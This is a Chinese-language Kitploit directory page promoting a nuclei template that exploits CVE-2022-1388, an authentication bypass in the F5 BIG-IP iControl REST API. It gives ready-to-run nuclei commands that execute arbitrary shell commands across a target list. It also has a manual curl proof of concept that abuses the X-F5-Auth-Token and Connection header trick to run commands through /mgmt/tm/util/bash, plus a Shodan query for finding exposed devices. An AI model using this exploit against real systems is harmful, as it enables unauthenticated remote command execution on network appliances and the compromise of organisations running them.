Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/mrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubmrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter

Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter

CVE-2022-1388 是 BIG-IP 的 iControl API 中 REST 组件的一个身份验证绕过漏洞,其 CVSSv3 评分为 9.8。iControl REST API 用于管理和配置 BIG-IP 设备。使用 BIG-IP 的设备,其管理端口或自身 IP 地址具有网络访问权限的未经身份验证的攻击者可利用 CVE-2022-1388。成功利用该漏洞可让攻击者执行任意系统命令、创建和删除文件以及禁用服务。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
624年前尚未审核

Nuclei 模板:利用 F5 BIG-IP iControl REST 认证绕过实现 RCE | 命令参数

CVE-2022-1388 是 BIG-IP iControl API 的 REST 组件中的一个认证绕过漏洞,其 CVSSv3 评分为 9.8。iControl REST API 用于 BIG-IP 设备的管理和配置。CVE-2022-1388 可被未认证的攻击者利用,只要攻击者具备访问使用 BIG-IP 设备的管理端口或 self IP 地址的网络访问权限。成功利用该漏洞后,攻击者可以执行任意系统命令、创建和删除文件以及禁用服务。

该模板使用 token-spray / nuclei 的 CLI 变量

该 nuclei 模板接受用于漏洞利用的 shell 参数。 我们想要测试从其他工作流或手动搜索中获取的令牌,因此我们使用 nuclei 的 CLI 变量功能,在运行时动态地向这些模板提供单个令牌值或令牌列表。

-V, -var value custom vars in var=value format

root@kitploit:~
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a

2022-05-10 01-28-12 的屏幕截图

手动 PoC

root@kitploit:~
curl -su admin \ 
-H "Host: localhost:8100" \ 
-H "Content-Type: application/json" \ 
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \ 
-H "Authorization: Basic YWRtaW46" \
 http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'

其他详细信息

  • https://www.shodan.io/search?query=http.title%3A%22BIG-IP%26reg%3B-+Redirect%22

参考资料

  • https://blog.projectdiscovery.io/nuclei-v2-5-release/
  • https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
  • https://github.com/alt3kx/CVE-2022-1388_PoC
  • https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md
  • https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py
  • https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.y
  • https://github.com/tenable/audit_files/tree/master/cve-2022-1388
  • https://support.f5.com/csp/article/K23605346
  • https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html
  • https://twitter.com/1ZRR4H/status/1522165718975922178
  • https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ipaml
下载工具